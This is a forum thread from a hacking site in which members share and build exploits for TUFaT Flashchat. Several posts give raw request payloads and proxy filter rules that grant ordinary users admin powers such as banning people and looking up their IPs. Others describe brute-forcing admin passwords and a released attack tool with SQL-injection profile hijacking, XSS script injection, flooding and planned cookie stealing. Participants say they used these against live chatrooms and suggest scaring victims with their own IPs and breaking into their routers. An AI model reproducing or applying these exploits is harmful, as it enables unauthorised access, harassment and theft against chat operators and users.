Flashchat exploits, hacks, tools & more

david zaragoza · Post by **david zaragoza** » Wed Oct 08, 2008 4:13 pm

sethioz .....u r the best .......

keep it up......thx for ur help....

i try out ur tutorial n give u the updates .....

n if u happen to get more flashchat hacks ....plz share wit me ....im always here to learn abt it...

thanx again...

Post by **Sethioz** » Wed Oct 08, 2008 7:56 pm

im sure there's more things that can be done, i just haven't exploited it more. Tried banning and booting only once and also same with talking under other names. boot worked, but im not sure what i did. think i used admin ID, but everyone can be admin if you use right password.
you can just mess around with tamper data and commview can be useful too.

oh yes. and you can create unbootable users lol, but you cant talk under them. you simply have to send the "join" packet again with different username (username has to be in same lenght or packet checksum is not same and it wont deliver) so the user you send with packets will appear, but is unbootable.

david zaragoza · Post by **david zaragoza** » Thu Oct 09, 2008 9:27 am

u said the tools ....wat do u mean by tat ....n how to use it

n also the attack types(userflooding,message flooding n etc)

n how to make all the chatters to leave and relogin ?...

and then the firefox 3 ...i uninstalled it ...now im using firefox 2.0 with the proxysel addon.....hoooooraay..

ur msg:
"tufatchat.org/blahdoh/ - this is the path where all other chatroom files are located"

this is wat u said earlier ..
so does it mean the mods password,admins password and banned ip's are kept there..

if it is ...then how to hack to the filez..n then also this part below i tried repetiting reading bt still cant get it....

ur msg:
"now look at the last bit of this data "id=" this is the id part. i left it empty, because you get id when you login or visit the getxml.php page. if you go directly to "getxml.php" (its the page that handles data sent by clients) you get this:

âˆ’
<response id="a71b57051abd921b01e995bbf31fca84">
<lout id="665982" t="6:22 pm">login</lout>
</response> "

anyway the proxysel addon ...i donno why it did nt work

i gt banned n then i closed the chat window n enabled the proxy b4 pressing the enter chat button...

after the login screen appears ...i turned off the proxy n input a different nick....n to my amazement it still displays 'YOU HAVE BEEN BANNED!'....mothaafuckaaz...

i tried alot of different proxy servers bt it still turned out to be same...

then the only way i can enter bck is by disconnecting n connecting again(i have a broadband connection wit dynamic IP)

n no clue why i cant use proxysel..

okay then ....

the last part here ...i dnt quite get u...can u plz explain more ..

"oh yes. and you can create unbootable users lol, but you cant talk under them. you simply have to send the "join" packet again with different username (username has to be in same lenght or packet checksum is not same and it wont deliver) so the user you send with packets will appear, but is unbootable"

wats unbootable users?

n also if there is a way to hack into the chatroom server ...it would be a big help ....

Post by **Sethioz** » Thu Oct 09, 2008 12:58 pm

i attached the tool. Luigi wrote it, because im not that good with C.
unbootable - it means the user cannot be booted, kicked or banned.
i used Net Tools 5 to make those users. It really pisses admins and mods off lmao. when some user pops up with name like .. BOOT_ME! and there is nothing they can do LOL. or name like I_OWN_U. usually everybody will be in PANIC!, specially admins and mods. I also think that those fake unbootable users can be made using "tcpfp". it is one good tool written by Luigi.

You can't just enable proxysel, you have to set a proxy server first ! use this to check your IP:
-IP Check-
as i said, proxysel is just for enabling/disabling proxy, it is NOT a proxy server. you have to add a valid proxy server into list first.
I also told you to get Vidalia+TOR (proxy servers). install it and run it. default port where it runs is 9050. so it will be running on local ip:
127.0.0.1:9050
this is what you set in proxysel. you will make it use TOR. This is what i have in proxysel:
IP - 127.0.0.1
Port - 9050
Socks4

I also said that you have to LOAD the login page with proxy, not enter with it. So enable proxy and LOAD the chat index.php page, then take proxy off and enter.

david zaragoza · Post by **david zaragoza** » Fri Oct 10, 2008 2:00 am

ok now i have vidalia,tor n also privoxy ......plus firefox addon proxysel..........

now how i can utilize it .....

Post by **Sethioz** » Fri Oct 10, 2008 1:31 pm

eem .. you dunno how to run vidalia ?
as about privoxy. i've tried 2 times and didnt got it working. as i said about proxysel:
make a new proxy with the settings i gave.
then simply run vidalia (it will run TOR automatically) and enable proxysel (choose the proxy you made ofcourse).

david zaragoza · Post by **david zaragoza** » Sun Oct 12, 2008 9:33 am

the Tor suckz ....

bt now im raged ....i wanna hack into the server ...do u know a way?

Post by **Sethioz** » Sun Oct 12, 2008 12:27 pm

TOR is one of the best proxys there is.. its not one server, but many. why it sucks ? slow ? or you simply can't get it working ?
yes there's lots of ways to hack into a site, but it's not that simple. you need to run several scans and tests. ofcourse you can use flashchatz to bruteforce users too, but its long and dunno if i wanna put it out on public.
If you intrested in bruteforcing .. then in short. option 1 can take users from list, but it does not save the valid user:pass, so i used commview's filters and alarms to stop the flashchatz on right place and get the password. i also used HEX to make a wordlist with username in front of it (flashchatz format). you can add me into MSN or PM me if you wanna know details about it. it very likely that admin uses same password on site too.

david zaragoza · Post by **david zaragoza** » Sun Oct 12, 2008 1:44 pm

yea ..okay bro ...thanx ...

Post by **Sethioz** » Tue Oct 21, 2008 1:38 am

LMAO, i just found something awsome, but i dont think i post it in public

Post by **Sethioz** » Tue Oct 21, 2008 1:49 am

PERMANENT admin rights in EVERY flashchat !!!
thats right, you read right.

its easy ! here's the packets:

Code: Select all

Bell
sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=

add room
sendAndLoad=%5Btype%20Function%5D&ps=&p=1&l=Cat&b=93647&c=adr&cid=1&id=

admin icon:
sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

mod icon:
sendAndLoad=%5Btype%20Function%5D&a=%3Amod%3A&u=0&b=13862&c=ravt&cid=1&id=

ip ban packet:

sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
5581 - id

whois packet:

sendAndLoad=%5Btype%20Function%5D&s=7&t=%2Fwhois%20NAME&r=2&u=0&b=20309&c=msg&cid=1&id=


room alert:
sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

sendAndLoad=%5Btype%20Function%5D&s=7&t=chatalert&b=18370&c=calrt&cid=1&id=

now the harder part. I am using paros proxy to do the filtering automatically so you will have admin rights

to get access to ban commands and whois..etc. you simply have to replace

Code: Select all

5D&t=

with

Code: Select all

5D&s=7&t=

and you can boot/ban ..etc ppl with a command.
now where you make it ?!
1. in paros proxy.
2. go to "tools" - "filter"
3. replace HTTP body rule
-this is where you do it. enable it and make your browser go thru the paros.

Lets take a look at one other packet.
Original Room Alert packet used by admins/mods:

Code: Select all

sendAndLoad=%5Btype%20Function%5D&s=0&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

modified Room Alert packet, that can be used by non-admin/mod:

Code: Select all

sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

see difference ? s=0 is replaced with s=7. you cant make a filter here, because when you are normal user your packet will be totally different. you can use old good tamper data here, to use whole packet.

Post by **Sethioz** » Thu Oct 23, 2008 4:03 pm

This new stuff i found really got me interested in it again. Basically you can do anything you want. Here's some values in packets, which i found out during my research. you can manipulate flashchat by changing those values in packets.

Code: Select all

t=

this is a text message sent into server. for example t=blah is like:
blah
this is how it looks in chat.

Code: Select all

u=

user. this is user id. it is used to PM or ban. Here's a PERFECT way to sniff out IDs. when you enter chatroom, then server sends you a response with all users and their IDs. it should be second response packet from server. For example when you send normal message, then the code part looks like this:

Code: Select all

t=blahblah&u=0

so 0 is public, but if you sniff out the user ID and use that instead. like so:

Code: Select all

t=blahblah&u=303

then you will send your text to user who's id is 303.

Code: Select all

c=

this is type of the message i guess. here's few variables:
ring - rings the bell
msg - message
banu - ban and ban ip

there's also r=, b=, s= ..etc, but im not sure what they do. "r" seems to be on 2 always (r=2).

i also found 2 tools that come in handy if you want to hack chatrooms:
WebScarab and Paros Proxy. both can intercept data. paros can make filters too, but it lags. webscarab can also intercept and edit responses.

david zaragoza2 · Post by **david zaragoza2** » Thu Oct 30, 2008 2:21 pm

sorry sethioz ...i have been away ...

n by the way ...i cant log in wit my original user id( have no idea why is tat)...

so this is my new id

....the topic up there caught my eye ....

which program u used .....tamper data, wpe , or ....

pls tel me ....

Post by **Sethioz** » Thu Oct 30, 2008 7:56 pm

out of topic and not discussing it here anymore, but guess u too lazy to read NEWS in chatbox and IMPORTANT topic (so you should do so now).

well yes i used tamper data. also webscarab and paros.

jimmyx02 · Post by **jimmyx02** » Tue Jun 23, 2009 11:35 pm

i over abused this flash chat site ------------> http://www.ffy.com with tamper data and they blocked mozilla fire fox (i was baning ppl)
anyway to get around this?? u mentioned paros proxy but i find it difficult to use can u explain in details how to use it and make it run through
any brower??

jimmyx02 · Post by **jimmyx02** » Wed Jun 24, 2009 9:41 am

ok...never mind i got it to work but wat if they ban me while im using paros proxy??? it seems the only way i can have mod
control is when i log in with the paros on my browser

Post by **Sethioz** » Wed Jun 24, 2009 11:35 am

they banned firefox ? if they are really so dumb that they banned browser, then you can download "user agent switcher" from firefox add-ons, this allows you to appear as using other browser (anything you want, even custom)

paros is not so hard to use once you know what you changing, i used the filter options, but i can't remember which one was the right, well you can test and see whcih option works. theres some header, data...or something.

you can also use proxocket. it is harder to use, but if you know how to compile it and the right part of code, then all you need is to compile the .dll with right filter and then drop it into your firefox folder and it does all the replacing you want.

i can't remember, but i think flashchat checked for the packet's checksum, so it means that proxocket doesn't work unless you make another filter to change checksum (it is the sum of the data you send, which is set by paros..etc tools, like tamper data says "change checksum to xxx" or something like that). so in proxocket you have to make the filter manually. it also messes up your writing..so you can only say known lenght words i think.
if im right about checksum, then proxocket is not good for banning ..etc, but it is good for ringing bell for example, where you can make a custom filter, so for example when you say "ring/ring" (or whtever you want), then it rings the bell.

jimmyx02 · Post by **jimmyx02** » Wed Jun 24, 2009 8:36 pm

ok now i know how to use paros and tamper well...i used the user switch agent and now i can go in with firefox. yea they are total idiots to be baning a browser looool
thx for ur help anyway...this tamper data hole can be fixed with one code haha

crakrboy · Post by **crakrboy** » Wed Jun 24, 2009 11:14 pm

jimmyx02 wrote:ok now i know how to use paros and tamper well...i used the user switch agent and now i can go in with firefox. yea they are total idiots to be baning a browser looool
thx for ur help anyway...this tamper data hole can be fixed with one code haha

dude i had same problem as you did paros did the job? you must be some genious to get them to ban firefox ...you said it could be fixed with one code is that true?

jimmyx02 · Post by **jimmyx02** » Thu Jun 25, 2009 1:29 am

haha no i aint no genious they just too stupid...yea i keep an eye on the makers of the chat system and they came up with an update that will fix it with one code....this is a good place to keep an eye on wat the creators are doing http://forum.tufat.com/

Post by **Sethioz** » Thu Jun 25, 2009 11:21 am

what did they fix exactly ?
btw you can also do "/whois" command using the admin privileges exploit to see somebody's IP, if they so stupid that they ban firefox, then you can scare the shit out of them by telling them their own ip and saying that you gonna hack them. usually it works so well.

also long time ago when i first started hacking tufat flashchat, they had newer version, but it did not work. well it worked, but you was unable to change any settings at all. as soon as you changed something (like time settings..etc), then the chat did not load.

jimmyx02 · Post by **jimmyx02** » Fri Jun 26, 2009 3:25 am

yea i no /profile works too instead of /whois to show ip i tryed that they aint that scared of it lool....these guys have tryed everything to block me including blocking firefox and blocking proxys from entering their site...but once they realized i got through after they blocked proxys they unblocked it.

Post by **Sethioz** » Fri Jun 26, 2009 1:47 pm

as about proxys, you can easily use TOR and then read TOR / Vidalia - how to use specific server/s as exit node. theres thousands of proxy servers and you can set any country as exit node, then you can use paros, webscarab and even burp suite i think to double route. so first your fox connects to your proxy and then proxy connects to TOR.

this is still flashchat topic, but if you get somebody's IP, you can scan it for open ports, lot of ppl have their NetBIOS ports open which allows you to basically get full control over pc or you can get access to their router and ban them from their own router or something (lot of ppl have default admin user and name in their router).

kula: why exactly that site name is not right ?
if somebody keeps messing with your chatroom, then there is a good reason for that (usually is). I first started working on flashchat when i got booted and banned from one chat i used to go, because one stupid girl started to blame me and everybody belived her not me, soo i took steps.

Post by **Sethioz** » Fri Jun 26, 2009 5:23 pm

i only removed it to protect the member not the chatroom.
this is going totally offtopic, do not post such things here, it is still flashchat exploits topic.

jimmyx02 · Post by **jimmyx02** » Fri Jun 26, 2009 8:07 pm

ok ill run some tests on the router ban trick ill get back to u if anything....as for king or wat ever ur name is why not ask me to remove the site link, im the one that posted it lool...site link stays on!!! i will add another later

Post by **Sethioz** » Fri Jun 26, 2009 8:24 pm

router ban trick ?
as i mentioned, tools like burp suite, webscarab ..etc allows double proxying (or how to call it). firefox > webscarab > proxy

further offtopic posts will be deleted from this topic

Post by **dark_lord_tnt** » Sat Jul 04, 2009 5:59 pm

I need a few Beta Testers as well as Contributors to a continutation of luigi's Flashchatz.. The project involves an upgrade based on the original concept. It will basically be a windows appilication that will exploit all of tufats flaws. The souce is closed but will be given to all contributing coders who are testers.. Testers are required to test the app in all situations as well as test any upgrades made to it, provide feedback to coders so that it can reach it full potential.. its in VB .NET 2005. Currently There are no member to this project besides me. I also require someone to host and distribute the app. Future projects as well. If intrested please contact me.

Post by **Sethioz** » Sat Jul 04, 2009 6:12 pm

so you planning to implant all the exploits ive found into it ? for example you can choose "ban" and then user and hit "go" or "do it" or whatever and it bans the person from chat ?
im not directly interested in it anymore, but you can add me to msn (i will pm you on site, not here, cuz forum's pm does not work) and i can test and help whenever im up for it, but no promises.

Post by **dark_lord_tnt** » Sat Jul 04, 2009 6:38 pm

Yeah basically everything the Admins can do and a lot more.. Think of it as a windows chat client.
1.) connects a user account
2.) retrives all info, incluing users, ids, rooms, and main chat log (yeah it even brings up the log)
3.) send message to main , or to a user
4.) get user id,
5.) send urgent message

The above is already implemented and works!!!

Yet to implement (proof of concept and trial works for these)
6.) Inject Image in main chat (proof of concept works)
7.) Inject Image in Invite (proof of concept works)
8.) Mass Unignore bombs single or multiple user (proof of concept works and better than i thought alomst like a DDOS attack)
9.) Mass Invite attack on single or multiple user (with Option image injection) .... works just like the above
10.) Kick User
11.) Kick Room
12.) Ban User
13.) Ban Ip
14.) Unban User / ip
15.) Room alert / chat alert
16.) Move User to any room
17.) Gag
18.) Room empty& flood

These work in theory
19. accept pm messages
20.) hijack pm messages
21.) Hijack user message and change contents
22.) Hijack user profile and customize it
23). Customize your own profie with exploit
24.) get user email / chnage password ..

e.g exploited profile...

http://chat.smstt.com/profile.php?user=18663

Post by **Sethioz** » Sat Jul 04, 2009 7:09 pm

few ideas:

1. Retrieve all users IPs (proof of concept works) and save into a file maybe. (works with my admin privilege exploit and /whois)
2. Steal user's cookie - in theory it should work if you know how to write a cookie stealer and implant it into an message or smile.
i think it is something like your hijack user profile, or is it ? or is it the user id ?
3. talk under other names
a standalone feature, which will allow you to choose a victim from list and talk under that name (with autoupdate which sees who enteres room). this can be done either by stealing the ID or cookie. i sucessfully talked under other name, but i can't remember what i used, id or whole cookie.

Post by **dark_lord_tnt** » Sat Jul 04, 2009 8:23 pm

1. Retrieve all users IPs (proof of concept works) and save into a file maybe. (works with my admin privilege exploit and /whois) ...

Yes This ih how i did it,, currently it displays it in a text box when you click on it.. (THE APP IS A FULL GUI)

2. Steal user's cookie - in theory it should work if you know how to write a cookie stealer and implant it into an message or smile.
i think it is something like your hijack user profile, or is it ? or is it the user id ? ..

Thats a Graet idea, unfortunately "i dont yet know" ( will learn ) how to write a cookie stealer,, And i guess it may be possible to implant it as you suggested.. Will work on it..

The Profile hijack uses SQL injection URL based.

.....
talk under other names
a standalone feature, which will allow you to choose a victim from list and talk under that name (with autoupdate which sees who enteres room). this can be done either by stealing the ID or cookie. i sucessfully talked under other name, but i can't remember what i used, id or whole cookie.

Another great idea,, one i'm currently poundering on,, unfortunately anything i tried thus far sisnt work cause u need both ID's lout and ID.. I can the the lout ID, but havent found a way to get the ID .. I guess the same stealer you mentioned above is the key.. Will work on it.. I'm leaning to the fact you used the ID when you chatted under the dif.. name. I tried it and wound up getting timed out!!

maybes thats cause i used firefox and tamper.. Its possible that firefox required a reply, but the app will not require one

.. I'll work on it after i finish the rest... ADDING COOKIE / ID stealer and & Chat as another user to list..

If you can remember how you did it.. that will be most helpful.

Post by **dark_lord_tnt** » Sat Jul 04, 2009 8:41 pm

HERE IS A SCREEN SHOT

flash.jpg: (62.49 KiB) Downloaded 1589 times

The blacked out piece is something that will not be released in the one for public use.. Only members and people who helped will have axcess to that.. Thats includes by idea's, feedback, coders, and testers,,especially for hosters and distributors.

Post by **Sethioz** » Sat Jul 04, 2009 9:41 pm

As about user cookie, i tried to use those simple cookie stealers available on web, but they never worked for me. however you need to add option "choose cookie stealer".
How it works, is that cookie stealer is a file, like "stealcookie.php" and to get it, you need to make somebody click on that link from inside of other site. for example i can post a javascript on my post with full path to stealcookie.php in it, so when you click on it, then it will store your cookie from current site into that.
So you need to add the 'cookiestealer.php' + the option where to choose it. so for example you can upload the 'cookiestealer.php' to whereever you want and then select the uploaded 'cookiestealer.php' from program, then it will be used. and as about how to make ppl click on it ... well maybe some image or i dunno .. whatever works in flashchat.

one more idea
Anti- boot, ban ..etc - this would work if chatroom thinks that user has admin privileges. admins cannot be kicked, banned ..etc.
alternatively, based on some games, maybe it sends you an 'disconnect' packet, but if you block this packet, then you will stay in chat, however this should not work on ip ban.

maybe also some fontsize would work or some other stuff that would mess up whole screen (like it works in prochat).

Post by **dark_lord_tnt** » Sun Jul 05, 2009 1:01 am

yeah ,,t sends a lout packet however it wont be processed.. but i aint sure yet. Well have to see how it works but yeah i will try to do something like that.

Post by **Sethioz** » Sun Jul 05, 2009 1:28 am

well my msn is open if you wanna talk about it in detail. so far what you showed and told .. looks quite good.

haco.pk3 · Post by **haco.pk3** » Sun Jul 05, 2009 3:06 pm

mmm indeed this is very sexy tool I like it

Post by **dark_lord_tnt** » Sun Jul 05, 2009 7:20 pm

Just an Update!!

I'm Im proving the Chat Box, It now shows the user + Message and updates Itself
Currently there is no need to log in the chat..

I will do some more work on the chat box over the next few days to allow smilies and the user colors.. I'll need somone to rip the smilies form the chat room for me!!! And If I can get someone to give me the packets for all admin commands and well as the irc /me commands .. If not i'll need to set up a server and uplaoad it an all that crap.. If anyone has a chat room that I can get full admin rights to i can do it my self as time permits... ANY CODERS INTRESTED ???

NEW SCREEN SHOT

flash.jpg: (97.98 KiB) Downloaded 1703 times

Post by **Sethioz** » Sun Jul 05, 2009 9:11 pm

this is the part where im getting lazy and annoyed, you can easily get all the commands by googling for "flashchat admin commands" or something like that. however if you want to test, then i still have flashchat on my own. look above or look on main page into left menus.
i will pm you the admin password if you need to see and test admin commands.

once again, pm does not work on forum so i have to send it on main site.

Post by **dark_lord_tnt** » Mon Jul 06, 2009 3:04 pm

Sethioz:: Thats quite ok!! your help thus far was more that i could have asked for. The use of your forum and Chat room was more than i had expected.. I was thinking maybe someone who was reading the post had already had them so i would have saved some time, but getting them isnt a problem..

I will have the first beta finished and packaged over the next day or so.

Update :: Implemented String handling so now the chat box displays the streams in Bolds and italliacs as it would in the
normal chat room.

Profile View and Profile hack works and is fully functional (FOR REGISTED SITE MEMBERS ONLY)

STATUS -- Aint BAN, ANTI KICK , ANTI GAG IMPLEMENTED ( thank you Sethioz for the suggestion and solution)
( Credit given to you for that ... I placed a link to your site as well as your name on the credit list)
(Still has to be tested more though)

testing version will be out within the next day or so I will upload as an attachment to a post here!!, Required are the .net framework (3). Will Include necessary Dll. In installer. But remember the GUI is just for testing the final version will have a different layout and More features. I havent finished all the commands I listed yet I'm just releasing this one (what i have thus far) So you guys can see it and get a better understanding of what I'm going to do.. Look for it at my next Post.!!

Post by **Sethioz** » Mon Jul 06, 2009 3:49 pm

you really got the Anti- thing working ? i never tested it on my own, but it seems that flashchat is even more vulnerable than i tought.

One more idea for you, only when chatroom is for registered users (or maybe for admin). a password cracker (bruteforce and dictionary).
Proof of Concept is working, i used Luigi's flashchatz to crack passwords, how ?
First i converted a wordlist into a user:pass with fixed username, like this:
Admin:pass1
Admin:pass2
Admin:pass3

then i started flooding the chatroom with this file and used commview to capture packets. I can't remember responses from head, but theres few of them.
"WrongPass"
"Successful login"
..and uh really cant remember others, however i made filter so it never captured the wrongpass or the other ones and alarm with a trigger to enable a ridiculous filter (like size=900000). why ? because commview does not have the "stop trigger" so i had to improvise, i added ridiculous filter to stop the capture, at least no packets was logged anymore. then i simply checked the last sent packet and saw what the password was.

Post by **dark_lord_tnt** » Mon Jul 06, 2009 4:02 pm

Well I never fully tested it.. What i did was try to kick myself out and i couldnt!! still needs to be fully tested..

Hmm I look at that.. its a realy great idea.. let me get this release out and i'll work that in the next version.

Post by **Sethioz** » Mon Jul 06, 2009 4:14 pm

if you was able to kick yourself before and then you used the exploit without being logged in as admin and you couldn't kick yourself, then obviously it's working.
however to change chatroom from normal to registered users...its not easy. as far as i remember you have to choose that when installing flashchat onto your site. so i can't be much help with that test. long time ago i used netsons.org to host a free site and then uploaded the test chatroom there..so i can spam it all i want during testing.

Post by **dark_lord_tnt** » Mon Jul 06, 2009 5:51 pm

I'll use Xammp and host and run the chat script on ly local machine.. unfotrunately I'll have to download the script first.. I'll find one on one of those torrent sites i guess. Any way I'll do that later Currently working on getting this what i have so for out for release.. Few things to correct and add or change so that hopefully it will install and run error free.. (yeah it has an installer)

Post by **Sethioz** » Mon Jul 06, 2009 6:38 pm

lil bit offtopic, but if you wanna run it locally i suggest you to use virtual machine and install a linux or win server in it. im sure it would come in handy if you are working on such projects that needs testing.

is installer such a good idea ? i personally hate installers, its way better if you just extract the program into a folder and run it.
anyways once you have the final version i can drop it into the "downloads" if you want.

Post by **dark_lord_tnt** » Mon Jul 06, 2009 8:28 pm

Yeah that will be great!! thank you..

Well concerning the installer it may be necessary as some of the needed components people may not have and it will not work in the same app directory it needs to be registerd.

But taking your concerns into consideration I will release 2 packages. 1 with the installer and the second just unzip and run..

Installer version..

here is the release promised. Its zipped with the read me and package.. (EASY UNINSTALL AND UPGRADE)

let me know if anyone has problems using it so i can fix that in the next release. Please view the readme for instructions on use. BTW you need to left click a user name to set that user as active victum. then right click for additional options.. And you need to have the correct url for it to work ... NO ERROR HANDLING CURRENTLY..

Please provide feedback on the GUI and Functions I know the gui needs improving and it currently a mess but is necessary for develompent. Once its working I will Improve it. Most features are missing cause it isnt implemented yet or take out cause of improper testing..

flashchatextreme.zip: (243.7 KiB) Downloaded 1126 times

Post by **dark_lord_tnt** » Mon Jul 06, 2009 8:32 pm

Here is the same without the installer. Extract All files to same directory and run flash.exe..
.net frame work is needed.

tested it on a 4 systems with the .net framework and it ran fine. If you have problems you will need to use the installer

Post by **Sethioz** » Mon Jul 06, 2009 10:34 pm

i took a quick look into the one without installer, connected fine and messages seem to be working fine too, however bell didn't seem to work.
also when i right clicked my own name and IP, then nothing seemed to happen.
however GUI looks quite good to me. i only tested in my own chat for now.

btw do you put all the features from Luigi's original flashchatz in it too ? like flooding and such ?
and yeah those alert and announcement messages can also be done with the exploit mentioned here (cant remember it from head)

Post by **dark_lord_tnt** » Mon Jul 06, 2009 11:08 pm

yeah disabled the bell and ip before i released it.. It wasnt tested propperly and it sometimes doesnt seem to work ,, havent paid much attention to it yet. .. yeah everything from the flashchatsz will be included but some will only work on chatrooms you dont have to register with. the flooding for example. But i have found ways to implement something similar with the same effect in registered ones. But those that will take down the server will only be given to certin people (those who are assisting me) like you. All other features I'm guessing, since your hosting the app, will only be avilable to member of your site. When I'm done with this I'll take a look into that pro rooms chat i saw you guys talking about on another post. It should take about a week to have this fully functional.

BTW.. cant find the attributes for the text color of other users,, any idea where I can look ??

BTW looked at the bruteforcer for the admin panel, It does seem possible and i will include it in The MASTER VERSION.. I need a name for this maybe flashchatz 2.0 with Luigi's permission.. I'll ask him.

Post by **Sethioz** » Tue Jul 07, 2009 6:01 am

Extreme Flashchatz would do, if Luigi is fine with it, but im sure he is if you add credits.

about release, i can put it into downloads in the way you want, for example some light version is available for everybody, then the main version (which you want to release in public) will be available for registered users and the one with all features (which you wanna give only to certain ppl) would either be in Private or not downloadable at all (i can give you the Private section's pass if you want).

Post by **dark_lord_tnt** » Wed Jul 08, 2009 3:23 am

Yeah thanks,, that will be great But I'd prefer you handle that part.. Well luigi said it wouldnt be a good idea to call it flashchatz as its not an upgrade to the original but a different tool all together. He sis however suggest flashchatx,, So putting the two together I think Extreme Flashxhat-X seems good!!.. BTW Can i use your logo on the Flashscreen seeing that its exclusive to your site and your providing a LOT!!! of help you deserve credit for it..

UPDATE!!!
Found Bug that the chat box wasnt scrolling automatically ... >>> FIXED
Found Bug that some user name's appear twice >>> FIXED
Found Bug that causes the Bell , ViewProfile and HackProfile not to work .. >> FIXED (variables wasnt inherited propperly)

Added Code for the KickOut Option, Improved the GUI a BIT
Added Code for Image injection into proflle
Added Code for Script injection Into profile ... XCSS anyone !!!

Found the info i needed for the Ban , unban and other stuff ... THANK YOU Sethioz

I'll be hammering your chatroom a bit to test these commands. I'll try my best not to cause any problems. Thank you again.

I'll Upload version 1.01 in a while 24-36 hrs i guess, should have almost half of everythng in it.